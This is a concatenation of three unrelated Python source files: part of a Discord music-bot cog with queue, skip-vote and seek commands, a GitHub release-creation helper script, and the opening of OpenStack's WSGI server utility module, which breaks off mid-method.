finalStr = finalStr + "\n" + "Next Up: "+str(entries[i]) + "\n"
elif i > 1 and not overLimit:
finalStr = finalStr + "\n`" + str(i+1) + ".` "+str(entries[i])
if overLimit:
finalStr = finalStr + "\n\n" + "**...Plus "+str(overLimit)+" more...**"
await ctx.send(finalStr, delete_after=60)
@commands.command(aliases=["np", "playing"])
async def nowplaying(self, ctx):
'''Show the current playing song'''
if ctx.guild.id not in self.players:
raise alreadyLeft
if len(self.players[ctx.guild.id][1].entries) == 0:
return await ctx.send("There is nothing playing because there are no entries in the playlist!", delete_after=15)
if not self.players[ctx.guild.id][0].is_playing():
return await ctx.send("The music is paused on: "+str(self.players[ctx.guild.id][1].entries[0]))
await ctx.send("Currently Playing: "+str(self.players[ctx.guild.id][1].entries[0]))
@commands.command(aliases=["reorder", "randomize"])
async def shuffle(self, ctx):
'''Randomize the order of the playlist'''
if ctx.guild.id not in self.players:
raise alreadyLeft
if not ctx.author.voice:
try:
is_mod = Perms.is_guild_mod(ctx)
except:
is_mod = False
if is_mod:
pass
else:
raise noChannel
if len(self.players[ctx.guild.id][1].entries) == 0:
return await ctx.send("There are no entries in the playlist!", delete_after=15)
self.players[ctx.guild.id][1].shuffle()
await ctx.send("The playlist has been shuffled.", delete_after=15)
@commands.command(aliases=["listpurge"])
@commands.check(Perms.is_guild_mod)
async def clear(self, ctx):
'''Empties the playlist completely. The current song keeps playing
If you wish to just kill the entire player and remove it from the server, try !kys instead.'''
if ctx.guild.id not in self.players:
raise alreadyLeft
if len(self.players[ctx.guild.id][1].entries) == 0:
return await ctx.send("There are no entries in the playlist.", delete_after=15)
songs = len(self.players[ctx.guild.id][1].entries)
self.players[ctx.guild.id][1].clear()
return await ctx.send("I have removed "+str(songs)+" songs from the queue.", delete_after=20)
@commands.command()
async def skip(self, ctx, *, pos : int = 1):
'''Skip the current entry or the entry at the given position
If the person who added the song or a server mod uses this, it instantly works.
Otherwise, if 5 skip votes in general are given, the skip passes.'''
if ctx.guild.id not in self.players:
raise alreadyLeft
pos -= 1
try:
self.players[ctx.guild.id][1].entries[pos]
except:
raise entryDoesntExist
try:
is_mod = Perms.is_guild_mod(ctx)
except:
is_mod = False
if ctx.author.id in self.players[ctx.guild.id][1].entries[pos].skipvotes:
raise alreadySkipped
playlist = self.players[ctx.guild.id][1]
if playlist.entries[pos].author_obj.id == ctx.author.id or is_mod:
if pos == 0:
if self.players[ctx.guild.id][0].is_playing():
await ctx.send("The current song (**"+playlist.entries[pos].name+"**) has been skipped.", delete_after=15)
try:
self.players[ctx.guild.id][0].stop()
except:
raise skipFailure
else:
#await playlist.afterplay(None)
await ctx.send("The current song (**"+playlist.entries[pos].name+"**) has been skipped. The player wasn't playing (or was downloading), but the entry was removed.", delete_after=15)
playlist.entries[pos].skipped = True
if playlist.entries[pos].downloading:
return await playlist.afterplay(None)
playlist.entries.remove(playlist.entries[pos])
else:
playlist.entries[pos].skipped = True
playlist.entries.remove(playlist.entries[pos])
await ctx.send("The song (**"+playlist.entries[pos].name+"**) at position "+str(pos+1)+" has been removed.", delete_after=15)
else:
playlist.entries[pos].skipvotes.add(ctx.author.id)
if len(playlist.entries[pos].skipvotes) >= 5:
if pos == 0:
if self.players[ctx.guild.id][0].is_playing():
await ctx.send("Vote passed; current song (**"+playlist.entries[pos].name+"**) skipped.", delete_after=15)
try:
self.players[ctx.guild.id][0].stop()
except:
raise skipFailure
else:
await ctx.send("The current song (**"+playlist.entries[pos].name+"**) has been skipped. The player wasn't playing (or was downloading), but the entry was removed.", delete_after=15)
playlist.entries[pos].skipped = True
if playlist.entries[pos].downloading:
return await playlist.afterplay(None)
playlist.entries.remove(playlist.entries[pos])
else:
playlist.entries[pos].skipped = True
playlist.entries.remove(playlist.entries[pos])
await ctx.send("The song (**"+playlist.entries[pos].name+"**) at position "+str(pos+1)+" has been removed by vote.", delete_after=15)
else:
# notify how many skips there are out of 5
await ctx.send("Vote confirmed. The song (**"+playlist.entries[pos].name+"**) in position "+str(pos+1)+" needs "+str(5-len(playlist.entries[pos].skipvotes))+" more skip votes to be skipped.", delete_after=15)
@commands.command(aliases=["unpause", "resume"])
async def pause(self, ctx):
'''Pause or unpause the music'''
if ctx.guild.id not in self.players:
raise alreadyLeft
playa = self.players[ctx.guild.id][0]
playalist = self.players[ctx.guild.id][1]
if playa.is_playing():
playa.pause()
return await ctx.send(ctx.author.name +" paused the music.")
if len(playalist.entries) > 0 and playa.is_paused():
playa.resume()
return await ctx.send(ctx.author.name +" resumed the music.")
if len(playalist.entries) == 0:
await ctx.send("I cannot unpause because the playlist is empty.")
try:
playa.resume()
except:
pass
@commands.command(hidden=True)
@commands.check(Perms.is_owner)
async def download(self, ctx):
''' download the first entry
Testing only'''
await self.players[ctx.guild.id][1].entries[0].download()
@commands.command(hidden=True)
@commands.check(Perms.is_owner)
async def forceplay(self, ctx):
''' force the first entry to play
Testing only'''
try:
await self.players[ctx.guild.id][1].entries[0].play(self.players[ctx.guild.id][0])
except:
traceback.print_exc()
def recursivelyGetAudioFiles(self, dir):
''' get the files in a directory
at this point, dir should be something like:
C:/audiodirectory/
'''
output = []
folders = []
try:
folders = [x for x in os.scandir(dir) if not x.is_file()]
except:
folders = []
types = ("*.wav", "*.mp3", "*.flac", "*.ogg", "*.mp4", "*.mov", "*.m4v")
for type in types:
try:
output.extend(glob.glob(os.path.join(dir, type)))
except:
pass
for folder in folders:
path = os.path.splitext(folder)[0]
output.extend(self.recursivelyGetAudioFiles(path + "/"))
return output
@commands.command(hidden=True, aliases=["dir2play"])
@commands.check(Perms.is_owner)
async def recursiveplay(self, ctx, *, directory:str):
''' queue an entire directory of songs recursively.
also works with -b'''
try:
# dont need to check for vc unless the command is open to all
if ctx.guild.id not in self.players and ctx.author.voice:
await self.summon.invoke(ctx)
else:
if ctx.author.voice:
if ctx.author.voice.channel.id != self.players[ctx.guild.id][
1].voice_channel.id and ctx.author.voice.channel.id != players[ctx.guild.id][0].channel.id:
if not (self.players[ctx.guild.id][0].is_playing()):
await self.summon.invoke(ctx)
change_later = await ctx.send("Getting recursive listing...")
try:
self.players[ctx.guild.id][1].waitingTask.cancel()
except:
pass
bassboost = False
if directory.split()[0].lower() == "-b":
if len(directory.split()) == 1:
await change_later.delete()
raise specific_error("You can't bass boost nothing.")
bassboost = True
directory = " ".join(directory.split()[1:])
if directory[-1] != "/":
directory += "/"
entries = self.recursivelyGetAudioFiles(directory)
position = 1
count = 0
entry = None
title = ""
try:
for song in entries:
title = re.search(r"([^\\/]*$)", song).group(0)
entry, position = await self.players[ctx.guild.id][1].add_entry(queuer=ctx.author, bass=bassboost,
forced_info={"title": title, "filepath": song})
count += 1
except:
traceback.print_exc()
await change_later.delete()
raise entryFailure
position -= len(entries) - 1
sendMessage = "Found and queued **%s** songs starting at position %s in the queue"
self.players[ctx.guild.id][1].chan = ctx.channel
if position == 1 and not self.players[ctx.guild.id][0].is_playing():
sendMessage = "Found and queued **%s** songs to play as soon as possible!"
sendMessage %= count
await change_later.edit(content=sendMessage)
await self.BarryBot.delete_later(change_later, 30)
self.players[ctx.guild.id][1].temp_message = change_later
cur_entr = self.players[ctx.guild.id][1].current_entry()
await self.players[ctx.guild.id][1].entries[0].download()
if cur_entr.skipped:
return
self.players[ctx.guild.id][1].message = await self.players[ctx.guild.id][1].chan.send(
"Now playing in " + self.players[ctx.guild.id][0].channel.name + ": " + str(
self.players[ctx.guild.id][1].entries[0]))
await self.players[ctx.guild.id][1].entries[0].play(self.players[ctx.guild.id][0])
else:
try:
time_to = await self.players[ctx.guild.id][1].time_to(position)
sendMessage += " - Rough estimation for when it will play: %s"
except:
time_to = "Error"
try:
sendMessage %= (count, position, time_to)
except:
sendMessage = "There was an error creating the final string, but " + count + " songs should have been queued anyways."
await change_later.edit(content=sendMessage)
await self.BarryBot.delete_later(change_later, 30)
except:
traceback.print_exc()
@commands.command(hidden=True, aliases=["dirplay"])
@commands.check(Perms.is_owner)
async def directoryplay(self, ctx, *, song:str):
''' play something straight from a filepath
also allows the use of -b
if you use -b you probably have to use quotes i dunno
Testing only (functional)'''
# dont need to check for vc unless the command is open to all
if ctx.guild.id not in self.players and ctx.author.voice:
await self.summon.invoke(ctx)
else:
if ctx.author.voice:
if ctx.author.voice.channel.id != self.players[ctx.guild.id][1].voice_channel.id and ctx.author.voice.channel.id != players[ctx.guild.id][0].channel.id:
if not(self.players[ctx.guild.id][0].is_playing()):
await self.summon.invoke(ctx)
change_later = await ctx.send("Adding manual link...")
try:
self.players[ctx.guild.id][1].waitingTask.cancel()
except:
pass
bassboost = False
if song.split()[0].lower() == "-b":
if len(song.split()) == 1:
await change_later.delete()
raise specific_error("You can't bass boost nothing.")
bassboost = True
song = " ".join(song.split()[1:])
if not os.path.isfile(song):
await change_later.delete()
raise specific_error("That file does not exist.")
try:
title = re.search(r"([^\\/]*$)", song).group(0)
entry, position = await self.players[ctx.guild.id][1].add_entry(queuer=ctx.author, bass=bassboost, forced_info={"title":title, "filepath":song})
except:
traceback.print_exc()
await change_later.delete()
raise entryFailure
sendMessage = "Found and queued **%s** at position %s in the queue"
self.players[ctx.guild.id][1].chan = ctx.channel
if position == 1 and not self.players[ctx.guild.id][0].is_playing():
sendMessage = "Found and queued **%s** to play as soon as possible!"
sendMessage %= title
await change_later.edit(content=sendMessage)
await self.BarryBot.delete_later(change_later, 30)
self.players[ctx.guild.id][1].temp_message = change_later
cur_entr = self.players[ctx.guild.id][1].current_entry()
await self.players[ctx.guild.id][1].entries[0].download()
if cur_entr.skipped:
return
self.players[ctx.guild.id][1].message = await self.players[ctx.guild.id][1].chan.send("Now playing in "+self.players[ctx.guild.id][0].channel.name+": "+str(self.players[ctx.guild.id][1].entries[0]))
await self.players[ctx.guild.id][1].entries[0].play(self.players[ctx.guild.id][0])
else:
try:
time_to = await self.players[ctx.guild.id][1].time_to(position)
sendMessage += " - Rough estimation for when it will play: %s"
except:
time_to = "Error"
try:
sendMessage %= (title, position, time_to)
except:
sendMessage = "There was an error creating the final string, but "+title+" should have been queued anyways."
await change_later.edit(content=sendMessage)
await self.BarryBot.delete_later(change_later, 30)
@commands.command()
async def seek(self, ctx, position:str):
''' Seek in the current audio to a position
The given position should be in an easy to interpret format.
The most complicated format is: HH:MM:SS.msms
If simply an integer or decimal is given, it uses that many seconds to seek to.
All seek times are from the beginning of the file.
If the seek time is not within the bounds of the file, the audio ends and the playlist continues.
If there is an error in your formatting, the audio ends and the playlist continues.'''
if ctx.guild.id not in self.players:
raise alreadyLeft
real_playa = self.players[ctx.guild.id][0]
if not real_playa.is_playing():
raise specific_error("The music is paused or nothing is queued.")
entry = self.players[ctx.guild.id][1].entries[0]
playa = self.players[ctx.guild.id][1]
try:
self.players[ctx.guild.id][0].source = discord.PCMVolumeTransformer(discord.FFmpegPCMAudio(entry.filename, before_options="-ss "+position), volume=playa.volume)
try:
pos = int(position)
except:
return await ctx.send("I moved the current position to "+position, delete_after=15)
hours = (int(pos/60/60))
pos = pos - 60*60*hours
mins = (int(pos/60))
pos = pos - 60*mins
return await ctx.send(f"I moved the current position to {hours:02}:{mins:02}:{pos:02}", delete_after=15)
except:
traceback.print_exc()
class Entry:
def __init__(self, playlist, queuer, name, duration=0, filename=None, url=None, bass=False, Filepath=None):
self.downloading = False
self.is_downloaded = False if not Filepath else True
self.playlist = playlist
self.author = queuer.name
self.author_obj = queuer
self.name = name
self.filepath = Filepath #this is used if we are not going to download the file
self.filename = filename #this is the direct filepath for a youtube download
self.duration = duration
self.skipvotes = set()
self.skipped = False
self.url = url
self.bassy = bass
self.boosted = False
def __str__(self):
if self.bassy:
return "**"+self.name+"** queued by "+self.author+". **Duration**: "+str(datetime.timedelta(seconds=self.duration))+" **Bass Boosted**"
else:
return "**"+self.name+"** queued by "+self.author+". **Duration**: "+str(datetime.timedelta(seconds=self.duration))
async def download(self):
if self.filepath:
self.downloading = False
self.is_downloaded = True
return
if self.downloading or self.is_downloaded:
return
self.downloading = True
if os.path.isfile(self.filename):
self.downloading = False
self.is_downloaded = True
return
try:
if not os.path.exists(self.playlist.downloader.path+"/"+str(self.playlist.chan.guild.id)):
os.makedirs(self.playlist.downloader.path+"/"+str(self.playlist.chan.guild.id))
result = await self.playlist.downloader.get_the_stuff(self.playlist.loop, self.url, download=True)
except:
raise downloaderBroke(self.playlist.stored_ctx)
if result is None:
raise downloaderBroke(self.playlist.stored_ctx)
self.downloading = False
self.is_downloaded = True
if self.skipped:
return await self.playlist.prune_song(self)
if self.bassy:
pass
# if not self.boosted:
# try:
# proc = await asyncio.create_subprocess_exec("ffmpeg", "-loglevel", "quiet", "-y", "-i", self.filename, "-af",
# "bass=g=15", self.filename+"_bass_"+self.filename[-5:])
# await proc.wait()
# await self.playlist.prune_song(self)
# self.filename = self.filename+"_bass_"+self.filename[-5:]
# except:
# traceback.print_exc()
# self.boosted = True
async def download_play(self, player):
''' this downloads and plays a song. this is a fallback for if somehow, a song gets deleted or is never downloaded'''
if self.playlist.voice_channel.id != player.channel.id:
self.playlist.voice_channel = player.channel
try:
await self.playlist.message.edit(content="Now (redownloading) in "+self.playlist.voice_channel.name+": "+str(self))
except:
pass
if self.skipped: #the song was skipped before done downloading
return await self.playlist.prune_song(self)
await self.download()
await self.play(player)
async def play(self, player):
''' this plays the song '''
#player.play(discord.PCMVolumeTransformer(discord.FFmpegPCMAudio(song), volume=0.5), after=lambda e: print("done", e))
if self.downloading:
await self.playlist.message.edit(content="Now (finishing download) in "+self.playlist.voice_channel.name+": "+str(self))
while self.downloading:
await asyncio.sleep(0.25)
if not self.is_downloaded:
self.playlist.loop.create_task(self.download_play(player))
return
if self.skipped:
return await self.playlist.prune_song(self)
self._play_sync(player)
def _play_sync(self, player):
''' i lied, this plays the song'''
if self.bassy:
player.play(discord.PCMVolumeTransformer(discord.FFmpegPCMAudio(self.filename, options="-af bass=g=15"), volume=self.playlist.volume), after=self._afterplay)
else:
player.play(discord.PCMVolumeTransformer(discord.FFmpegPCMAudio(self.filename), volume=self.playlist.volume), after=self._afterplay)
def _afterplay(self, error):
coro = self.playlist.afterplay(error)
future = asyncio.run_coroutine_threadsafe(coro, self.playlist.loop)
future.result()
class Playlist:
def __init__(self, bot, chan, message, voice_channel, player, ctx):
self.bot = bot #BarryBot
self.downloader = bot.downloader
self.entries = deque()
self.loop = bot.loop
self.chan = chan
self.message = message
self.temp_message = None
self.voice_channel = voice_channel
self.volume = float(bot.settings[chan.guild.id].features["playervol"])/100
self.player = player
self.stored_ctx = ctx
self.waitingTask = None
def __iter__(self):
return iter(self.entries)
def shuffle(self):
random.shuffle(self.entries)
def clear(self):
if self.player.players[self.chan.guild.id][0].is_playing():
playing = self.entries[0]
self.entries.clear()
self.entries.append(playing)
else:
self.entries.clear()
async def add_entry(self, url=None, queuer=None, bass=False, forced_info=None, **meta):
if forced_info:
entry = Entry(
self,
queuer,
forced_info.get('title', "Untitled"),
0,
forced_info.get("filepath", "Error"),
url,
bass,
forced_info.get("filepath", "Error"),
)
self.entries.append(entry)
return entry, len(self.entries)
try:
self.downloader.ytdl.params['outtmpl'] = os.path.join(self.downloader.path+"/"+str(self.chan.guild.id), self.downloader.tPN)
info = await self.downloader.get_the_stuff(self.loop, url, download=False)
except:
raise entryFailure
entry = Entry(
self,
queuer,
info.get('title', 'Untitled'),
info.get('duration', 0) or 0,
self.downloader.ytdl.prepare_filename(info),
url,
bass,
**meta
)
self.entries.append(entry)
if self.entries[0] is entry:
pass
#play the first song
return entry, len(self.entries)
async def time_to(self, position):
estimated_time = sum([entry.duration for entry in islice(self.entries, position-1)])
return datetime.timedelta(seconds=estimated_time)
def current_entry(self):
return self.entries[0]
async def afterplay(self, error, playNext=True):
if error:
print(error)
raise playerError(self.stored_ctx)
try:
if self.entries[0].filepath: #we are assuming we were triggering this function based off of playing the first entry and we are going to have serious issues if that isnt the case
pass #this just skips deleting the file if it was triggered by something other than a link or search, something we dont want to deleted
else:
dontDelete = False
if len(self.entries) > 1:
otherentries = [entry for entry in self.entries] #this is unfortunate because you arent allowed to copy.deepcopy() a deque in another thread... something about pickling, im no genius
otherentries.pop(0)
for entry in otherentries:
if entry.filename == self.entries[0].filename:
dontDelete = True
break
if not dontDelete:
done = False
for x in range(10): #trying 10 good times
try:
os.unlink(self.entries[0].filename)
done = True
break
except:
await asyncio.sleep(0.25)
if not done:
self.loop.create_task(self.prune_song(self.entries[0]))
self.entries.popleft()
try:
await self.message.delete()
except:
pass
try:
await self.temp_message.delete()
except:
pass
if self.voice_channel.id != self.player.players[self.chan.guild.id][0].channel.id:
self.voice_channel = self.player.players[self.chan.guild.id][0].channel
if len(self.entries) > 0 and playNext:
editLater = False
if not self.current_entry().is_downloaded:
self.message = await self.chan.send("Now (downloading) in "+self.voice_channel.name+": "+str(self.entries[0]))
editLater = True
try:
await self.entries[0].download()
except:
traceback.print_exc()
try:
await self.entries[0].play(self.player.players[self.chan.guild.id][0])
except:
traceback.print_exc()
if editLater:
await self.message.edit(content="Now playing in "+self.voice_channel.name+": "+str(self.entries[0]))
else:
self.message = await self.chan.send("Now playing in "+self.voice_channel.name+": "+str(self.entries[0]))
if len(self.entries) > 1:
await self.entries[1].download()
else:
lengthoftime = int(self.bot.settings[self.chan.guild.id].features["playerleave"])
await self.chan.send("The playlist is empty. The music has ended.", delete_after=lengthoftime)
self.waitingTask = asyncio.ensure_future(self._eventually_leave(lengthoftime))
except:
traceback.print_exc()
async def _eventually_leave(self, time):
''' leave the channel eventually, but this is cancellable'''
try:
await asyncio.sleep(time)
await self.player.players[self.chan.guild.id][0].disconnect()
del self.player.players[self.chan.guild.id]
except:
pass
async def prune_song(self, given): #given is an Entry object
''' given an entry it tries to run an afterplay but doesnt play anything after (basically it just deletes the file)'''
#removes the song from the directory but still leaves it if it exists later in the playlist for some reason
#this is meant to just clean up the directory, not remove stuff from the playlist
try:
if given.filepath:
return
else:
dontDelete = False
if len(self.entries) > 1:
otherentries = [entry for entry in self.entries]
otherentries.pop(0)
for entry in otherentries:
if entry.filename == given.filename:
dontDelete = True
break
if not dontDelete:
done = False
for x in range(30): #give it a good 30 tries instead because some songs could download for a long time
try:
os.unlink(given.filename)
done = True
break
except OSError as e:
if e.errno == errno.ENOENT:
done = True
print("tried to delete a file that doesn't exist. exiting early.")
break
else:
print("failed to delete currently downloading song")
await asyncio.sleep(0.5)
if not done:
self.loop.call_later(60, self.prune_song_retry, given)
except:
traceback.print_exc()
def prune_song_retry(self, given): #its prune_song but a retry because sometimes the download takes way too long and we dont want to waste time in a loop
''' to keep trying 30 times every 15 seconds every minute because we dont want to stick to this loop forever
also this is a failsafe to hopefully delete stuff if it ends up skipped or loose and should be deleted'''
self.loop.create_task(self.prune_song(given)) #but now that i think back, this might be unnecessary... still, its a fallback if somehow the song starts downloading after being queued to prune or ends up being pulled by another program and cant be deleted
class Downloader:
def __init__(self, download_path):
self.threadpool = ThreadPoolExecutor(max_workers=2)
self.ytdl = youtube_dl.YoutubeDL(ytdl_options)
self.tPN = self.ytdl.params['outtmpl']
self.ytdl.params['outtmpl'] = os.path.join(download_path, self.tPN)
self.path = download_path
async def get_the_stuff(self, loop, *args, **kwargs):
return await loop.run_in_executor(self.threadpool, functools.partial(self.ytdl.extract_info, *args, **kwargs))
|
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import tempfile
import dateutil.parser
import magic
import requests
from platforms.common import ReleaseException, run
MESSAGE_PROMPT_TEMPLATE = """\
# Add release notes below. Any lines starting with '#' will be ignored.
{default_message}
# Commits since last release:
#
{commit_messages}
"""
MESSAGE_TEMPLATE = """\
Includes various improvements and bug fixes, viewable here: {html_url}
"""
def get_version_and_timestamp_from_release(release):
""" Returns the version (without a 'v' prefix) and the timestamp of the release """
release_version = release["tag_name"].lstrip("v")
release_timestamp = dateutil.parser.parse(release["created_at"]).strftime("%s")
return release_version, release_timestamp
def get_token(token_file):
"""
Reads the first line from token_file to get a token
"""
with open(token_file, "r") as fin:
ret = fin.read().strip()
if not ret:
raise ReleaseException("No valid token found in {}".format(token_file))
return ret
def get_current_user(github_token, prefer_fb_email=True):
""" Gets info about the current github user """
url = "https://api.github.com/user"
emails_url = "https://api.github.com/user/emails"
headers = get_headers(github_token)
response = requests.get(url, headers=headers)
response.raise_for_status()
ret = response.json()
if not ret["email"].endswith("@fb.com") and prefer_fb_email:
while emails_url:
response = requests.get(emails_url, headers=headers)
response.raise_for_status()
fb_email = next(
(
email["email"]
for email in response.json()
if email["verified"] and email["email"].endswith("@fb.com")
),
None,
)
if fb_email:
ret["email"] = fb_email
break
else:
emails_url = response.links.get("next", {}).get("url")
return ret
def get_commit(repository, github_token, commit):
""" Gets a specific commit's info from github """
url = "https://api.github.com/repos/{}/commits/{}".format(repository, commit)
headers = get_headers(github_token)
logging.info("Fetching commit {} for {}".format(commit, repository))
response = requests.get(url, headers=headers)
response.raise_for_status()
return response.json()["sha"]
def get_latest_release(repository, github_token):
""" Gets the latest release object from github or None if there are no releases """
url = "https://api.github.com/repos/{}/releases/latest".format(repository)
headers = get_headers(github_token)
logging.info("Fetching latest release for {}".format(repository))
response = requests.get(url, headers=headers)
if response.status_code == 404:
return None
response.raise_for_status()
ret = response.json()
return ret
def get_summary_from_commit(commit):
""" Takes a full commit message, and gives something abbreviated for changelogs """
message = commit["commit"]["message"].split("\n")[0]
return "{}: {}".format(commit["sha"], message)
def get_summaries_between_releases(
repository, github_token, earliest_revision, latest_revision
):
"""
Gets all of the commit messages (as a list) for commits between earliest_revision
and latest_revision. These messages are summaries, not the full message
"""
url = "https://api.github.com/repos/{}/compare/{}...{}".format(
repository, earliest_revision, latest_revision
)
headers = get_headers(github_token)
response = requests.get(url, headers=headers)
response.raise_for_status()
js = response.json()
return (
js["html_url"],
[get_summary_from_commit(commit) for commit in js["commits"]],
)
def get_headers(github_token):
return {"Authorization": "token " + github_token}
def create_release(repository, github_token, message, version_tag, commit):
"""
Creates a release on github and returns that data
Args:
repository: The name of the repository to work on
github_token: The token to use for github operations
message: The message to put in the body of the release
version_tag: The tag to have github create. This is also used in the release
title
commit: The commit to pin the release to
"""
url = "https://api.github.com/repos/{}/releases".format(repository)
data = {
"tag_name": version_tag,
"target_commitish": commit,
"name": "Release {}".format(version_tag),
"body": message.format(tag=version_tag),
# Draft would be nice, but then the releases don't show up in the API,
# and we can't get tarball/zipball urls until publishing :(
"draft": False,
}
headers = get_headers(github_token)
logging.info("Creating a new release")
response = requests.post(url, json=data, headers=headers)
response.raise_for_status()
ret = response.json()
logging.info("Created new release at {}".format(ret["html_url"]))
return ret
def get_all_releases(repository, github_token):
""" Get all of the releases from github for a repository. Useful for changelogs """
url = "https://api.github.com/repos/{}/releases".format(repository)
headers = get_headers(github_token)
logging.info("Getting all releases")
releases = []
while url:
response = requests.get(url, headers=headers)
response.raise_for_status()
releases.extend(response.json())
if "next" in response.links:
url = response.links["next"]["url"]
else:
url = None
logging.info("Got {} releases".format(len(releases)))
return releases
def get_release_for_tag(repository, github_token, version_tag):
""" Gets the release from github for a specific git tag """
url = "https://api.github.com/repos/{}/releases/tags/{}".format(
repository, version_tag
)
headers = get_headers(github_token)
logging.info(
"Getting release information for {} tagged {}".format(repository, version_tag)
)
response = requests.get(url, headers=headers)
response.raise_for_status()
ret = response.json()
logging.info(
"Got release information for {} tagged {} ({})".format(
repository, version_tag, ret["html_url"]
)
)
return ret
def prompt_for_message(html_url, summaries):
"""
Prompts the user for a release message in an editor, showing them the commits since
last release, and returns what the user specified
Args:
html_url: The url to see the difference between the current commit and the
commit for the previous release.
summaries: The commit summaries to display to the user
"""
default_message = create_default_message(html_url)
summaries_text = "\n".join(("# " + line for line in summaries))
full_message = MESSAGE_PROMPT_TEMPLATE.format(
default_message=default_message, commit_messages=summaries_text
)
temp_fd, temp_path = tempfile.mkstemp()
try:
with open(temp_path, "w") as fout:
fout.write(full_message)
editor = os.environ.get("EDITOR", "vim")
run([editor, temp_path])
with open(temp_path, "r") as fin:
message = "\n".join(line for line in fin if not line.startswith("#"))
message = message.strip()
if not message:
raise ReleaseException("No valid message was provided")
return message
finally:
if os.path.exists(temp_path):
os.remove(temp_path)
def create_default_message(html_url):
return MESSAGE_TEMPLATE.format(html_url=html_url)
def add_assets(release, github_token, path):
"""
Add an asset at `path` to a specific release
Args:
release: The release object from github
github_token: The token to modify the release
path: The path of the file to upload
Returns:
The asset object from github
"""
filename = os.path.basename(path)
url = release["upload_url"].replace("{?name,label}", "?name=" + filename)
headers = get_headers(github_token)
headers["Content-Type"] = magic.from_file(path, mime=True)
logging.info("Adding {} at {} to release".format(filename, path))
with open(path, "rb") as fin:
response = requests.post(url, headers=headers, data=fin)
if response.status_code == 422:
raise ReleaseException(
"A file by the name of {} is already attached to {}".format(
filename, release["html_url"]
)
)
response.raise_for_status()
ret = response.json()
logging.info("Added {} to release at {}".format(filename, release["html_url"]))
return ret
def create_new_release(
repository, github_token, version_tag, message, should_prompt_for_message
):
"""
Creates a new release, optionally prompting the user for a release message
Args:
repository: The github repository
github_token: The github token that can create releases
verison_tag: The version tag that should be created at the current 'master'
message: If None, prompt the user for a message (or create a default one),
otherwise use this message for the release summary.
should_prompt_for_message: If false, just create a release that points to the
list of changes between the last release and this one.
Otherwise, prompt the user for a message.
Returns:
The github repository object
"""
master_commit = get_commit(repository, github_token, "master")
if not message:
latest_release = get_latest_release(repository, github_token)
commit_summaries = []
html_url = ""
if latest_release:
latest_release_hash = get_commit(
repository, github_token, latest_release["tag_name"]
)
html_url, commit_summaries = get_summaries_between_releases(
repository, github_token, latest_release_hash, master_commit
)
if should_prompt_for_message:
message = prompt_for_message(html_url, commit_summaries)
else:
message = create_default_message(html_url)
release = create_release(
repository, github_token, message, version_tag, master_commit
)
logging.info("Created release at {}".format(release["html_url"]))
return release
|
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2010 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Utility methods for working with WSGI servers."""
from __future__ import print_function
import copy
import os
import socket
import eventlet
import eventlet.wsgi
import greenlet
from paste import deploy
import routes.middleware
import webob.dec
import webob.exc
from oslo_log import log as logging
from oslo_service import _options
from oslo_service import service
from oslo_service import sslutils
from oslo_service._i18n import _, _LE, _LI
LOG = logging.getLogger(__name__)
def list_opts():
"""Entry point for oslo-config-generator."""
return [(None, copy.deepcopy(_options.wsgi_opts))]
def register_opts(conf):
"""Registers WSGI config options."""
return conf.register_opts(_options.wsgi_opts)
class InvalidInput(Exception):
message = _("Invalid input received: "
"Unexpected argument for periodic task creation: %(arg)s.")
class Server(service.ServiceBase):
"""Server class to manage a WSGI server, serving a WSGI application."""
def __init__(self, conf, name, app, host='0.0.0.0', port=0, pool_size=None,
protocol=eventlet.wsgi.HttpProtocol, backlog=128,
use_ssl=False, max_url_len=None):
"""Initialize, but do not start, a WSGI server.
:param conf: Instance of ConfigOpts.
:param name: Pretty name for logging.
:param app: The WSGI application to serve.
:param host: IP address to serve the application.
:param port: Port number to server the application.
:param pool_size: Maximum number of eventlets to spawn concurrently.
:param protocol: Protocol class.
:param backlog: Maximum number of queued connections.
:param use_ssl: Wraps the socket in an SSL context if True.
:param max_url_len: Maximum length of permitted URLs.
:returns: None
:raises: InvalidInput
:raises: EnvironmentError
"""
self.conf = conf
self.conf.register_opts(_options.wsgi_opts)
self.default_pool_size = self.conf.wsgi_default_pool_size
# Allow operators to customize http requests max header line size.
eventlet.wsgi.MAX_HEADER_LINE = conf.max_header_line
self.name = name
self.app = app
self._server = None
self._protocol = protocol
self.pool_size = pool_size or self.default_pool_size
self._pool = eventlet.GreenPool(self.pool_size)
self._logger = logging.getLogger("eventlet.wsgi.server")
self._use_ssl = use_ssl
self._max_url_len = max_url_len
self.client_socket_timeout = conf.client_socket_timeout or None
if backlog < 1:
raise InvalidInput(reason=_('The backlog must be more than 0'))
bind_addr = (host, port)
# TODO(dims): eventlet's green dns/socket module does not actually
# support IPv6 in getaddrinfo(). We need to get around this in the
# future or monitor upstream for a fix
try:
info = socket.getaddrinfo(bind_addr[0],
bind_addr[1],
socket.AF_UNSPEC,
socket.SOCK_STREAM)[0]
family = info[0]
bind_addr = info[-1]
except Exception:
family = socket.AF_INET
if self._use_ssl:
sslutils.is_enabled(conf)
try:
self._socket = eventlet.listen(bind_addr, family, backlog=backlog)
except EnvironmentError:
LOG.error(_LE("Could not bind to %(host)s:%(port)s"),
{'host': host, 'port': port})
raise
(self.host, self.port) = self._socket.getsockname()[0:2]
LOG.info(_LI("%(name)s listening on %(host)s:%(port)s"),
{'name': self.name, 'host': self.host, 'port': self.port})
def start(self):
"""Start serving a WSGI application.
:returns: None
"""
# The server socket object will be closed after server exits,
# but the underlying file descriptor will remain open, and will
# give bad file descriptor error. So duplicating the socket object,
# to keep file descriptor usable.
self.dup_socket = self._socket.dup()
self.dup_socket = self._set_socket_opts(self.dup_socket)
if self._use_ssl:
